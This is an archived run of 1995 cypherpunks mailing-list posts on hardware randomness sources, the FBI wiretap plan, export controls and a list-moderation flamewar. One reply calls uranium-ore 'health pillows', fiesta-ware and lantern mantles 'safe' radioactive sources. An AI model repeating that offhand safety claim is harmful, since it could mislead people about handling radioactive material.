To: cypherpunks@toad.com
Subject: Re: FBI seeks huge wiretapping system
Message-ID: <199511031202.EAA09281@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


>I was being facetious. The point is that the government has no
>inherent right to tap our phones -- indeed, it didn't do so for nearly
>the first 200 years of our existance, and we did just fine -- better,
>in fact. 

It is a well-known fact that it was common practice for NSA operatives to
masquerade as Injuns in the 1800's and waylay Pony Express riders in order
to intercept communications between targeted parties. This practice lost
popularity towards the end of the century with the advent of boxed cereal,
and with it the Lone Ranger Decoder Ring, since the operatives were too
underfunded to afford anything more than oatmeal.

[ducks]
--
   Jay Campbell                edge@got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay@Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 3 Nov 1995 18:34:38 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Radiation Detectors from Aware Electronics
In-Reply-To: <9510038153.AA815390510@houston_cc_smtp.hai-net.com>
Message-ID: <199511031009.FAA11845@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry writes:
> There have been several requests for information on the company that 
> makes the radiation detectors with RS232 interfaces that I mentioned.
>      
> Here is how to reach them:

Skip writes:
> So what does this have to do with this mailing list??

Perry recently recommended the use of background-radiation detectors as 
good cheap true RNGs. Properly deployed cryptography generally depends upon
excellent PRNGs, or preferably hardware RNGs.

Perhaps you overlooked that rather lengthy thread, Skip ?

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 3 Nov 1995 18:58:16 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: censored with Perry
In-Reply-To: <199511031355.HAA16831@mail.socketis.net>
Message-ID: <199511031020.FAA24928@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Enzo Michelangeli writes:
> In any case, before Perry (rightly) send us stern reminders of the scarce
> crypto relevance of this thread, let's take it out of Cypherpunks 

Gary Jeffers writes:
>    Perry is again narrowly defining allowable speech on Cypherpunks.

Since Perry hasn't said a damn thing about this Hong Kong ISP thread on the 
list, I suggest that you're wasting your time chasing around a hypothetical
situation.  

-Futplex <futplex@pseudonym.com>	Me speak for Perry ?
        "It just couldn't be, and only a fool would say that" -Steely Dan, 1972




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Fri, 3 Nov 1995 21:58:50 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Risks of ``foreign persons'' under the ITAR
Message-ID: <m0tBMJy-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


It is usually assumed that a foreign person outside the United States
runs no risks if he posts cryptographic software to the net or
otherwise discloses it to other foreign persons, although technically
that is a violation of the United States International Traffic in Arms
Regulations.

I note, however, that in an article entitled ``Export Controls on
Encryption Software'' by Ira S. Rubenstein, dated October 17, 1994 
(which apparently was distributed at some legal conference) the
following passage appears in Section 4(3):

                     ----------------

Finally, foreign employees of those companies or any foreign person
who runs afoul of export controls on technology transfers may face
severe immigration consequencs.[83]  Under the Immigration and
Nationality Act,[84] as revised by the immigration act of 1990,[85] an
alien who seeks entry to the U.S. to engage in activities that violate
or evade export control laws is excludable.[86]  Similarly, an alien
who has engaged, is engaged, or at any time after entry engages in
such activities is deportable.[87]

                           [Notes]

[83] For a detailed discussion see generally Rubinstein, ``Export
Controls and Immigration Law,'' 93-3 Immigration Briefings (Mar.
1993). 

[84] Immigration and Nationality Act of 1952, Pub. L. No. 82-414, 66
Stat. 163 (codified as amended at 8 USC \S\S 1101-1524) (hereinafter
INA).

[85] Immigration Act of 1990, Pub. L. No. 101-649, 104 Stat. 4978
(hereinafter IMMACT 90).

[86] INA \S 212(a)(3)(A)(i)(II), 8 USC \S 1182(a)(3)(A)(i)(II).

[87] OMA \S 21(a)(4)(A)(i), \S 1251(a)(4)(A)(i).

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Fri, 3 Nov 1995 22:36:37 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: video as a source of public randomness
In-Reply-To: <acbf02ca0402100496c4@[205.199.118.202]>
Message-ID: <Pine.OSF.3.91.951103090838.4011B-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain


	Would not generating random numbers using video sources be
suseptable to the same 'external' influences as generating random numbers
from radio static? External RF fields could skew the 'randomness' of the
data. 
	As another thought, has anyone done any work on RNGs involving
chaotic processes such as fluid dynamics and turbulent flow? I suspect
that pressure, or other parameter variences, in turbulent flow could yield
good random numbers. As a bonus, these parameters are easily measurable 
without special, exotic, equipment and should be inexpensive

Regards, Tim Philp

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 Nov 1995 22:36:37 +0800
To: sharborth@hai-net.com
Subject: Re: Radiation Detectors from Aware Electronics
In-Reply-To: <9510038153.AA815390510@houston_cc_smtp.hai-net.com>
Message-ID: <199511031419.JAA08735@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



sharborth@hai-net.com writes:
>      So what does this have to do with this mailing list??

Generating good random numbers is key to operating a solid
cryptographic system. I've argued that computer interfaced radiation
detectors are the optimal way of generating such numbers because they
are hard to screw up -- biased diode noise and other sources are too
easy to misdesign or misuse. Aware is a source of such detectors.

Perry

> There have been several requests for information on the company that 
> makes the radiation detectors with RS232 interfaces that I mentioned.
>      
> Here is how to reach them:
>      
> Aware Electronics
> P.O. Box 4299
> Wilmington, DE 19807
> Phone (800) 729-5397
>       (302) 655-3800
>      
>      
> Perry
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 Nov 1995 22:50:05 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Sources of randomness
In-Reply-To: <acbf085205021004e36c@[205.199.118.202]>
Message-ID: <199511031427.JAA08758@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> I meant a t.v. channel, as in broadcast t.v., such as is easily gotten with
> rabbit ears, or nothing (since the idea is to get noise, from the ether, or
> from the tuner itself). A snow-filled picture has pixels which are unlikely
> in the extreme to be predicted/deduced by outside attackers, who cannot
> know the details of antenna orientation, microscopic variations in
> geometry, LRC, tuner sensitivity, etc. That is, snowy pictures are not
> guessable.

I'm not so sure. There may be hidden patterns we don't notice. Its on
little things like this that a cryptanalyst would try to pry open a
hole in a system. I'm unwilling to predict that the patterns are
unguessable based purely on gut instinct. As Bob Morris of the NSA has
said, never underestimate the effort your advesary will go to in order
to read your traffic.

I'll stick to recommending radioactive sources for now. Quantum
mechanics is your friend, and detectors from places like Aware are
cheap.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 Nov 1995 23:32:35 +0800
To: gjeffers@socketis.net (Gary Jeffers)
Subject: Re: censored with Perry
In-Reply-To: <199511031355.HAA16831@mail.socketis.net>
Message-ID: <199511031439.JAA08779@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Gary Jeffers writes:
> Enzo Michelangeli writes:
> 
> >In any case, before Perry (rightly) send us stern reminders of the scarce
> >crypto relevance of this thread, let's take it out of Cypherpunks and,
> >if someone is interested, let's continue by e-mail.
> 
>    Perry is again narrowly defining allowable speech on Cypherpunks.
> Encryption becomes a trivial topic if its best medium is taken by the
> States. Perry is still in his "only encryption algorithms in C is a
> proper topic for Cypherpunks" mode.

No, I don't think that, Mr. Jeffers, but I must admit that my opinion
is that random political crap (NOT careful announcements by the likes
of jya@pipeline.com of reprints of articles on the new FBI wiretap
garbage) doesn't belong. 

> This is a direction that if followed
> would take the vitality and relevance out of the Cypherpunks list. Perry
> does a disservice for Cypherpunks.

I'm sorry, but you do a disservice to the cause of freedom. People are
trying to get work done to actually get cryptographic systems written,
deployed, and popularized, and the sort of crap that fills this place
periodically prevents people from working together towards that
end. If you want to talk about politics, go to Libernet or some such. 

Tim May will doubtless disagree, but he has nothing else to do in life
than read the net so his incentives to see traffic minimized aren't
the same as other people's.

>    Since when did Cypherpunks become the mailing list fit for Perry?

Look, its simple. If you want the FBI and NSA to win, post lots of
crap here. Nothing will help them out more than clogging one of the
few communications channels available to people interested in
spreading cryptography. If you are really successful, all the smart
people will leave (as has happened in waves before -- the losses of
Steve Bellovin and (effectively) Phil Karn are still felt) and you
will have totally destroyed the channel.

> we must also take the time and trouble to occasionally tell Perry to
> shove his opinions up his ass.

If you want the anti-crypto people to win, nothing can help nearly so
much as your attitude. I'm glad to see what side you are on.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 Nov 1995 23:32:32 +0800
To: futplex@pseudonym.com
Subject: Re: Radiation Detectors from Aware Electronics
In-Reply-To: <199511031009.FAA11845@opine.cs.umass.edu>
Message-ID: <199511031440.JAA08790@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Futplex writes:
> Perry recently recommended the use of background-radiation detectors as 
> good cheap true RNGs. Properly deployed cryptography generally depends upon
> excellent PRNGs, or preferably hardware RNGs.

Just one comment -- I think one is better off with a tiny cheap
radiation source when using such a system than in depending on
background, but the point is the same...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 3 Nov 1995 23:29:56 +0800
To: cypherpunks@toad.com
Subject: Kallstrom Calls All Calls Tappable
Message-ID: <199511031441.JAA18237@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-3-95. Wash Post:

   "Privacy Groups Assail FBI's Wiretapping Plan" [Excerpt]


   James Kallstrom, assistant FBI director in charge of the
   New York field division, argues that the proposal would in
   fact reduce the FBI's surveillance authority. "Today ... we
   could tap all the phones in the United States," he said,
   referring to older, pre-digital technology. Under the plan,
   the FBI's surveillance ability would shrink to a maximum of
   1 percent of simultaneous telephone calls from any one
   telephone switch, he said.

   Kallstrom said a typical central switching office in New
   York that serves 50,000 telephone lines has a capacity to
   carry only 5,000 calls simultaneously. It is the latter
   number, not the former, he said, on which the FBI bases its
   calculations. So the highest level of simultaneous
   surveillance in that area, he said, would be 50 lines.

   "We've never done that many" taps at one time, he said. But
   in a "worst-case scenario," such as a major act of
   terrorism, the agency might need such ability, he said. "I
   think it's a reasonable, minimal, conservative number."












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ljo@ausys.se (Johansson Lars)
Date: Fri, 3 Nov 1995 23:19:58 +0800
To: lvhove&amp;vnet3.vub.ac.be@vnet3.vub.ac.be
Subject: RE: Info needed on observers
Message-ID: <95Nov3.093928gmt+0100.53773@void.ausys.se>
MIME-Version: 1.0
Content-Type: text/plain




>I am currently preparing a paper on payment systems for the Internet
>and related issues.  I recently found out that so-called observers could
>be placed on smart cards (in order to prevent double spending, or even to
>prevent people from cheating on taxes...).
>
>To be honest that's about all I know about observers and I am very eager
>to find out more.  I am, however, having a hard time finding interesting
>references on this subject.
>
>Hence, all suggestions to get me started would be extremely welcome.
>Questions of particular interest are: possible functions (and limits),
>how 'real' are they already?, what about privacy?, ...
>
>Many thanks in advance.

Leo,

The concept 'Wallet (Databases) with Observers' was introduced by
David Chaum and Torben Pryds Pedersen at Crypto '92. See the
proceedings of that conference. Put shortly, it is a method of preventing
double spending of digital cash, stored on a smart card, and still
provide full payer anonymity.

Since then, others have worked on improving the original protocol,
e.g. Ronald Cramer, Niels Ferguson and Stefan Brands. In particular
the system by Stefan Brands have drawn much attention since it was
said to offer "provable security". It is his protocol that is used in the
european project CAFE.

In CAFE, each user is thought to have a PDA (Personal Digital Assistant)
which stores the digital cash. The observer is a smart card that has to
be inserted into the PDA in order to spend that cash. I don't know how
far this project has come, implementation wise but I think another project,
called SWAP was about to test these electronic wallets in practise.

Regards,
/Lars Johansson
ljo@ausys.se





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@amanda.dorsai.org>
Date: Fri, 3 Nov 1995 23:31:56 +0800
To: Norman Hardy <norm@mediacity.com>
Subject: Re: Bruce Schneier's Applied Cryptography, 2nd Edition
In-Reply-To: <acbe05a801021004ca84@DialupEudora>
Message-ID: <Pine.SUN.3.91.951103094647.25772G-100000@amanda.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 1 Nov 1995, Norman Hardy wrote:

> Stanford University Book Store (om compus) has a bunch at about $49.

I just picked up a copy from Computer Book Works in NYC (On Warren Street 
between Church & Broadway near City Hall.)  They only had the softcover 
version there.

Now does anyone want my old 1st edition? :-)

==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
===================http://www.dorsai.org/~sunder/=========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 Nov 1995 23:32:45 +0800
To: cypherpunks@toad.com
Subject: Re: Kallstrom Calls All Calls Tappable
In-Reply-To: <199511031441.JAA18237@pipe2.nyc.pipeline.com>
Message-ID: <199511031451.JAA08816@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



John Young writes:
>    "Privacy Groups Assail FBI's Wiretapping Plan" [Excerpt]
> 
>    James Kallstrom, assistant FBI director in charge of the
>    New York field division, argues that the proposal would in
>    fact reduce the FBI's surveillance authority.

Kallstrom is the guy who was using the example of snuff films (a known
urban legend) to try to FUD the audiance at the Bar Association debate
into supporting key escrow.

It appears, by the way, that the FBI may have goofed here. Even Steve
Post, the morning classical radio announcer on WNYC-FM in New York,
was making fun of the FBI this morning.

[Lets try not to make this into an extensive thread. We all have work
to do. For example, I have a 4.4BSD IPSEC implementation in my
possession that I don't have time to integrate into NetBSD and FreeBSD
in the next few weeks. Any volunteers out there?]

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sharborth@hai-net.com
Date: Fri, 3 Nov 1995 23:55:13 +0800
To: perry@piermont.com
Subject: Re[2]: Radiation Detectors from Aware Electronics
Message-ID: <9510038154.AA815422683@houston_cc_smtp.hai-net.com>
MIME-Version: 1.0
Content-Type: text/plain


     Perry -
     
     Sorry for the rude question.  I have been following this thread 
     closely but must have missed the original message regarding using 
     radiation detectors to produce random numbers.
     
     Skip


______________________________ Reply Separator _________________________________
Subject: Re: Radiation Detectors from Aware Electronics 
Author:  perry@piermont.com at internet
Date:    03-11-95 09:23


sharborth@hai-net.com writes:
>      So what does this have to do with this mailing list??
     
Generating good random numbers is key to operating a solid 
cryptographic system. I've argued that computer interfaced radiation 
detectors are the optimal way of generating such numbers because they 
are hard to screw up -- biased diode noise and other sources are too 
easy to misdesign or misuse. Aware is a source of such detectors.
     
Perry
     
> There have been several requests for information on the company that 
> makes the radiation detectors with RS232 interfaces that I mentioned. 
>      
> Here is how to reach them:
>      
> Aware Electronics
> P.O. Box 4299
> Wilmington, DE 19807
> Phone (800) 729-5397
>       (302) 655-3800
>      
>      
> Perry
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sat, 4 Nov 1995 12:15:46 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Sources of randomness
In-Reply-To: <199511031427.JAA08758@jekyll.piermont.com>
Message-ID: <Pine.3.89.9511030915.B49857-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 3 Nov 1995, Perry E. Metzger wrote:

> I'll stick to recommending radioactive sources for now. Quantum
> mechanics is your friend, and detectors from places like Aware are
> cheap.
What prices have you got listed? Is the equipment sensitive enough to get 
lots of entropy from a normal environment or do you need artificial sources
of radioactivity? (easy, safe and cheap enough to get?)
Got any clues on random bits vs. time?

Someone said this was discussed before, I caught the thread on the 
detector being listed but not any discussion of the product itself. Could 
anyone post an approx date so I could go look it up on the archive?
Gracias.
Interesting stuff.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sharborth@hai-net.com
Date: Sat, 4 Nov 1995 12:14:15 +0800
To: edge@got.net>
Subject: Re[2]: FBI seeks huge wiretapping system
Message-ID: <9510038154.AA815422767@houston_cc_smtp.hai-net.com>
MIME-Version: 1.0
Content-Type: text/plain



Subject: Re: FBI seeks huge wiretapping system 
Author:  Jay Campbell <edge@got.net> at internet
Date:    03-11-95 06:08


>I was being facetious. The point is that the government has no 
>inherent right to tap our phones -- indeed, it didn't do so for nearly 
>the first 200 years of our existance, and we did just fine -- better, 
>in fact. 
     
It is a well-known fact that it was common practice for NSA operatives to
                                                        ^^^
masquerade as Injuns in the 1800's and waylay Pony Express riders in order 
                            ^^^^^^
I think you'll find the NSA was not in existence in the 1800's.


to intercept communications between targeted parties. This practice lost 
popularity towards the end of the century with the advent of boxed cereal, 
and with it the Lone Ranger Decoder Ring, since the operatives were too 
underfunded to afford anything more than oatmeal.
     
[ducks]
--
   Jay Campbell                edge@got.net - Operations Manager 
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node 
   Jay@Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
     
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 01:02:29 +0800
To: Tim Philp <bplib@wat.hookup.net>
Subject: Re: video as a source of public randomness
Message-ID: <acbf861a06021004706b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:17 PM 11/3/95, Tim Philp wrote:
>        Would not generating random numbers using video sources be
>suseptable to the same 'external' influences as generating random numbers
>from radio static? External RF fields could skew the 'randomness' of the
>data.

Do a thought experiment, if not an actual experiment.

Tune your t.v. to an unused channel. Use no antenna, or perhaps just small
rabbit ears. Notice the swirl of snow (as in "Snow Crash"). Imagine
sampling bits from this snowstorm, perhaps 10 per frame. Apply the usual
tricks to remove biases in one direction or another (*) and apply hashes as
desired to distill bits of entropy.

(* Such as von Neumann's scheme to turn even biased coins into "fair"
sources: toss a coin twice and let H T be a 1 and T H be a 0.)

To complete the thought experiment: Imagine the difficulty of an attacker
being able to module this snowstorm in any predictable way. Imagine the
difficulty when the antenna input has been disconnected, or the rabbit ears
moved by air currents in the room, or....

"All crypto is economics." The cost of an attack based on modulating this
source of randomness would be in the tens of billions of dollars, or more,
and likely impossible at any cost at this time. (Depending on the sampling
details, the antenna input, etc. I'm not saying a black bag job could not
be done to alter the inputs to the t.v., just that external RF manipulation
is unlikely in the extreme to be economically feasible.)


>        As another thought, has anyone done any work on RNGs involving
>chaotic processes such as fluid dynamics and turbulent flow? I suspect
>that pressure, or other parameter variences, in turbulent flow could yield
>good random numbers. As a bonus, these parameters are easily measurable
>without special, exotic, equipment and should be inexpensive

Ignoring the work allegedly done on "chaotic encryption," the RF method
described above essentially is relying on turbulence: the atmospheric
variations ("spherics," "whistlers," are some of the buzz words) affect the
snowstorm. Also, the rabbit ear antennas move in response to room air
currents.

Again, all unpredictable. (And as I noted above, sampling strategy is
important...)

I  don't plan to belabor this point. Radioactive decay sources are
certainly fine, though not likely to be purchased by most people. (I have
nothing against radioactive decay, as some of you may know--it made my
career.)

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 4 Nov 1995 12:10:04 +0800
To: cypherpunks@toad.com
Subject: Re: Bruce Schneier's Applied Cryptography, 2nd Edition
Message-ID: <acbf8a88070210047acb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:48 PM 11/3/95, Ray Arachelian wrote:


>Now does anyone want my old 1st edition? :-)

I am interested. I will trade five (5) slightly used prime numbers for it.

(Has anybody ever thought about using prime numbers as a medium of barter
in a digital economy? Think of the labor that would be saved if we all
didn't have to compute our own!! :-})

--Klaus! von Used Primes

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rthomas@pamd.cig.mot.com (Robert Owen Thomas)
Date: Sat, 4 Nov 1995 01:15:30 +0800
To: tony266@vabeach.email.net
Subject: Re: What!!!
In-Reply-To: <9511021825.S84530450@vabeach.email.net>
Message-ID: <9511031023.ZM14801@pamd.cig.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


tony266 said...
] Can someone tell me this cypherpunks is all about???

the great Dr Fred Cohen debate.  oh, and an occasional comment upon
encryption and security... ;-)

regards,
--robert
--

o  robert owen thomas: unix consultant. cymro ydw i. user scratching post.  o
o       e-mail: Robert.Thomas@pamd.cig.mot.com --or-- robt@Cymru.COM        o
o               vox:  708.435.7076   fax:  708.435.7360                     o
o        "When I die, I want to go sleeping like my grandfather...          o
o              Not screaming like the passengers in his car."               o




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 4 Nov 1995 14:27:29 +0800
To: perry@piermont.com
Subject: Physician, Heal Thyself
Message-ID: <acbf8c7e08021004f0bb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:38 PM 11/3/95, Perry E. Metzger wrote:

>Tim May will doubtless disagree, but he has nothing else to do in life
                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>than read the net so his incentives to see traffic minimized aren't
>the same as other people's.


Perry, would you please knock off the drone of snide remarks about me? I
mostly don't respond to your posts. You often make very good points, but at
other times you demonstrate a shrillness and apparent lack of socialization
that I find appalling.

Your snide remarks are, to use your own rhetoric, "wasteful of bandwidth."
They are also tacky, childish, and pointless.

You are often quick to say "What has this got to do with Cypherpunks?," but
you yourself are perfectly willing to rant on about Nietzsche, the East
Germans, and Louis Freeh. Physician, heal thyself.


--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sat, 4 Nov 1995 00:30:23 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: Sources of randomness
In-Reply-To: <Pine.3.89.9511030915.B49857-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.SOL.3.91.951103102756.19997B-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 3 Nov 1995 s1113645@tesla.cc.uottawa.ca wrote:

> 
> 
> On Fri, 3 Nov 1995, Perry E. Metzger wrote:
> 
> > I'll stick to recommending radioactive sources for now. Quantum
> > mechanics is your friend, and detectors from places like Aware are
> > cheap.
> What prices have you got listed? Is the equipment sensitive enough to get 
> lots of entropy from a normal environment or do you need artificial sources
> of radioactivity? (easy, safe and cheap enough to get?)


Safe, easy-to-obtain gamma sources:  orange fiesta-ware pottery (at flea 
markets), old-style Coleman lantern mantles (not sure about the new 
ones), uranium-ore "health pillows" (Sunshine Mine, 408-225-3670).

-bd

> Got any clues on random bits vs. time?
> 
> Someone said this was discussed before, I caught the thread on the 
> detector being listed but not any discussion of the product itself. Could 
> anyone post an approx date so I could go look it up on the archive?
> Gracias.
> Interesting stuff.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sun, 5 Nov 1995 01:02:06 +0800
To: Gary Jeffers <gjeffers@socketis.net>
Subject: [noise] Re: censored with Perrymoose
In-Reply-To: <199511031355.HAA16831@mail.socketis.net>
Message-ID: <Pine.3.89.9511031008.C49857-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 3 Nov 1995, Gary Jeffers wrote:

>    Perry is again narrowly defining allowable speech on Cypherpunks.

Killfiles exist. Judging by the amount of ranting, raving, paranoia and 
please help!!! posts, isn't it inevitable that you'll get get some shut up
posts too? They make for entertaining flamewars (remember "my operating 
system is better than yours!!"? groan ). The frequency of [noise] postings 
might even be considered a decent PRNG.

Shut up shutting up ;->




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Sat, 4 Nov 1995 00:50:07 +0800
To: cypherpunks@toad.com
Subject: Re: Bruce Schneier's Applied Cryptography, 2nd Edition
In-Reply-To: <acbe05a801021004ca84@DialupEudora>
Message-ID: <199511031547.KAA07609@hammond.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian writes:
 > Now does anyone want my old 1st edition? :-)

I intend to donate mine to a local library. I'd like to think that
some bright high schooler, or junior high schooler even, might get the
crypto bug a little earlier than I did.

I'll try to persuade them to leave a copy of the errata stapled to the
inside back cover.  Heck, if you have the cash flow*, donate a 2nd
edition instead.

nathan
* or the need for a $60 tax shelter.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 05:30:00 +0800
To: cypherpunks@toad.com
Subject: Re: video as a source of public randomness
Message-ID: <acbf9287090210045bcb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:08 PM 11/3/95, Perry E. Metzger wrote:
>Timothy C. May writes:
>> I  don't plan to belabor this point. Radioactive decay sources are
>> certainly fine, though not likely to be purchased by most people.
>
>Video digitzation equipment connected to TV tuners turned to dead air,
>your suggestion, are equally unlikely to be purchased by most
 ^^^^^^^^^^^^^^^^
>people. The geiger counters are very simple and cheap, too.


It is not correct to call this my "suggestion." I was responding to a
previous post by Andrew Isaacson who said: "How useful would it be to use a
video stream as a source of random input to something like /dev/random?
I'm thinking along the lines of a Connectix QuickCam (sp?) or the cool
videocam that comes with the Indy...."

I was commenting on the sources of randomness, such as atmospheric RF
variations, antenna configuration, tuner sensitivity, amplifier noise,
etc., that would make prediction of snow bits very difficult.

As to suggesting setting the tuner to dead air, this was just one facet of
the discussion.

I have no brief with any of the proposed schemes: nearly any are better
than what we have now, if widely deployed and suitable used.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 4 Nov 1995 05:26:40 +0800
To: cypherpunks@toad.com
Subject: Re: censored with Perry
Message-ID: <199511031858.KAA24013@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry writes:
>>    Perry is again narrowly defining allowable speech on Cypherpunks.
>> Encryption becomes a trivial topic if its best medium is taken by the
>> States. Perry is still in his "only encryption algorithms in C is a
>> proper topic for Cypherpunks" mode.
>
>No, I don't think that, Mr. Jeffers, but I must admit that my opinion
>is that random political crap (NOT careful announcements by the likes
>of jya@pipeline.com of reprints of articles on the new FBI wiretap
>garbage) doesn't belong. 

Well, Perry, my opinion is that there is far too much noise on this list 
as it is.  I have already seen my words drowned out by bellyaching over 
next to nothing.

As one of the many non-Americans on this list, I find US policy and
politics simply _amusing_, but certainly not in the least bit relevant to
nearly anything that I do. 

>> This is a direction that if followed
>> would take the vitality and relevance out of the Cypherpunks list. Perry
>> does a disservice for Cypherpunks.
>
>I'm sorry, but you do a disservice to the cause of freedom. People are
>trying to get work done to actually get cryptographic systems written,
>deployed, and popularized, and the sort of crap that fills this place
>periodically prevents people from working together towards that
>end. If you want to talk about politics, go to Libernet or some such. 

Perry, you put an interesting twist on what the agenda of most people on
